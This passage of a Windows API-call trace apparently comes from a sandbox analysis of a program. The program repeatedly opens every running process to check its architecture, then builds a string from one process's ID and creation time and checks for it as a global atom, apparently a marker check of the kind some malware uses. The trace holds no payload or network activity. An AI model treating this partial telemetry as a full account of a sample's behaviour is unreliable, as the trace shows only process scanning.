	[0099.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x37c
	[0099.499] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.500] CloseHandle (hObject=0x37c) returned 1
	[0099.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x37c
	[0099.500] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.500] CloseHandle (hObject=0x37c) returned 1
	[0099.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x37c
	[0099.500] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.500] CloseHandle (hObject=0x37c) returned 1
	[0099.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x37c
	[0099.500] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.500] CloseHandle (hObject=0x37c) returned 1
	[0099.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x37c
	[0099.500] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.500] CloseHandle (hObject=0x37c) returned 1
	[0099.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x37c
	[0099.500] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.501] CloseHandle (hObject=0x37c) returned 1
	[0099.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x37c
	[0099.501] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.501] CloseHandle (hObject=0x37c) returned 1
	[0099.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x37c
	[0099.501] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.501] CloseHandle (hObject=0x37c) returned 1
	[0099.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x37c
	[0099.501] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.501] CloseHandle (hObject=0x37c) returned 1
	[0099.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x37c
	[0099.501] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.501] CloseHandle (hObject=0x37c) returned 1
	[0099.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x37c
	[0099.502] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.502] CloseHandle (hObject=0x37c) returned 1
	[0099.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x37c
	[0099.502] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.502] CloseHandle (hObject=0x37c) returned 1
	[0099.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x37c
	[0099.502] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.502] CloseHandle (hObject=0x37c) returned 1
	[0099.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x37c
	[0099.502] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.502] CloseHandle (hObject=0x37c) returned 1
	[0099.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x37c
	[0099.502] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.502] CloseHandle (hObject=0x37c) returned 1
	[0099.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x37c
	[0099.503] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.503] CloseHandle (hObject=0x37c) returned 1
	[0099.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x37c
	[0099.503] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.503] CloseHandle (hObject=0x37c) returned 1
	[0099.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x37c
	[0099.503] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.503] CloseHandle (hObject=0x37c) returned 1
	[0099.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x37c
	[0099.504] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.504] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0099.504] GetProcessTimes (in: hProcess=0x37c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0099.504] wsprintfA (in: param_1=0x679068, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0099.504] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.504] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0099.505] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.505] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0099.505] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0099.505] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0099.505] CloseHandle (hObject=0x37c) returned 1
	[0099.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0099.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0099.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x37c
	[0099.505] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.505] CloseHandle (hObject=0x37c) returned 1
	[0099.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x37c
	[0099.506] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.506] CloseHandle (hObject=0x37c) returned 1
	[0099.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0099.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0099.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0099.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0099.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0099.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0099.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0099.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0099.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0099.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0099.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0099.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0099.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0099.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0099.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0099.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0099.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0099.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0099.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x38c
	[0099.590] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.590] CloseHandle (hObject=0x38c) returned 1
	[0099.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0099.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0099.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x38c
	[0099.591] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.591] CloseHandle (hObject=0x38c) returned 1
	[0099.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0099.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x38c
	[0099.591] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.591] CloseHandle (hObject=0x38c) returned 1
	[0099.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x38c
	[0099.591] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.591] CloseHandle (hObject=0x38c) returned 1
	[0099.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x38c
	[0099.592] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.592] CloseHandle (hObject=0x38c) returned 1
	[0099.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x38c
	[0099.592] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.592] CloseHandle (hObject=0x38c) returned 1
	[0099.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x38c
	[0099.592] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.592] CloseHandle (hObject=0x38c) returned 1
	[0099.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x38c
	[0099.592] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.592] CloseHandle (hObject=0x38c) returned 1
	[0099.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0099.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x38c
	[0099.593] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.593] CloseHandle (hObject=0x38c) returned 1
	[0099.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x38c
	[0099.593] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.593] CloseHandle (hObject=0x38c) returned 1
	[0099.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x38c
	[0099.593] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.593] CloseHandle (hObject=0x38c) returned 1
	[0099.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x38c
	[0099.593] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.593] CloseHandle (hObject=0x38c) returned 1
	[0099.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x38c
	[0099.593] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.593] CloseHandle (hObject=0x38c) returned 1
	[0099.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x38c
	[0099.594] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.594] CloseHandle (hObject=0x38c) returned 1
	[0099.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x38c
	[0099.594] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.594] CloseHandle (hObject=0x38c) returned 1
	[0099.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x38c
	[0099.594] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.594] CloseHandle (hObject=0x38c) returned 1
	[0099.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x38c
	[0099.594] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.594] CloseHandle (hObject=0x38c) returned 1
	[0099.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x38c
	[0099.594] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.594] CloseHandle (hObject=0x38c) returned 1
	[0099.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x38c
	[0099.595] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.595] CloseHandle (hObject=0x38c) returned 1
	[0099.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x38c
	[0099.595] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.595] CloseHandle (hObject=0x38c) returned 1
	[0099.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x38c
	[0099.595] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.595] CloseHandle (hObject=0x38c) returned 1
	[0099.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x38c
	[0099.595] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.595] CloseHandle (hObject=0x38c) returned 1
	[0099.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x38c
	[0099.595] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.595] CloseHandle (hObject=0x38c) returned 1
	[0099.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x38c
	[0099.596] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.596] CloseHandle (hObject=0x38c) returned 1
	[0099.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x38c
	[0099.596] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.596] CloseHandle (hObject=0x38c) returned 1
	[0099.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x38c
	[0099.596] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.596] CloseHandle (hObject=0x38c) returned 1
	[0099.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x38c
	[0099.596] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.596] CloseHandle (hObject=0x38c) returned 1
	[0099.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x38c
	[0099.597] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.597] CloseHandle (hObject=0x38c) returned 1
	[0099.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x38c
	[0099.597] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.597] CloseHandle (hObject=0x38c) returned 1
	[0099.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x38c
	[0099.597] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.597] CloseHandle (hObject=0x38c) returned 1
	[0099.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x38c
	[0099.597] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.597] CloseHandle (hObject=0x38c) returned 1
	[0099.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x38c
	[0099.598] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.598] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0099.598] GetProcessTimes (in: hProcess=0x38c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0099.598] wsprintfA (in: param_1=0x679720, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0099.598] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.598] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0099.599] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.599] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0099.599] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0099.599] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0099.599] CloseHandle (hObject=0x38c) returned 1
	[0099.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0099.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0099.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x38c
	[0099.599] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.599] CloseHandle (hObject=0x38c) returned 1
	[0099.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x38c
	[0099.600] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.600] CloseHandle (hObject=0x38c) returned 1
	[0099.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0099.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0099.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0099.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0099.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0099.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0099.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0099.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0099.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0099.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0099.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0099.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0099.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0099.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0099.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0099.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0099.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0099.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0099.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x38c
	[0099.673] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.673] CloseHandle (hObject=0x38c) returned 1
	[0099.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0099.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0099.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x38c
	[0099.674] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.674] CloseHandle (hObject=0x38c) returned 1
	[0099.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0099.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x38c
	[0099.674] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.674] CloseHandle (hObject=0x38c) returned 1
	[0099.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x38c
	[0099.674] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.674] CloseHandle (hObject=0x38c) returned 1
	[0099.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x38c
	[0099.674] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.674] CloseHandle (hObject=0x38c) returned 1
	[0099.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x38c
	[0099.675] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.675] CloseHandle (hObject=0x38c) returned 1
	[0099.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x38c
	[0099.675] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.675] CloseHandle (hObject=0x38c) returned 1
	[0099.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x38c
	[0099.675] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.675] CloseHandle (hObject=0x38c) returned 1
	[0099.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0099.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x38c
	[0099.675] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.675] CloseHandle (hObject=0x38c) returned 1
	[0099.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x38c
	[0099.676] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.676] CloseHandle (hObject=0x38c) returned 1
	[0099.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x38c
	[0099.676] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.676] CloseHandle (hObject=0x38c) returned 1
	[0099.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x38c
	[0099.676] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.676] CloseHandle (hObject=0x38c) returned 1
	[0099.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x38c
	[0099.676] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.676] CloseHandle (hObject=0x38c) returned 1
	[0099.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x38c
	[0099.676] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.676] CloseHandle (hObject=0x38c) returned 1
	[0099.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x38c
	[0099.676] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.677] CloseHandle (hObject=0x38c) returned 1
	[0099.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x38c
	[0099.677] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.677] CloseHandle (hObject=0x38c) returned 1
	[0099.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x38c
	[0099.677] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.677] CloseHandle (hObject=0x38c) returned 1
	[0099.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x38c
	[0099.677] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.677] CloseHandle (hObject=0x38c) returned 1
	[0099.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x38c
	[0099.677] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.677] CloseHandle (hObject=0x38c) returned 1
	[0099.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x38c
	[0099.677] IsWow64Process (in: hProcess=0x38c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.678] CloseHandle (hObject=0x38c) returned 1
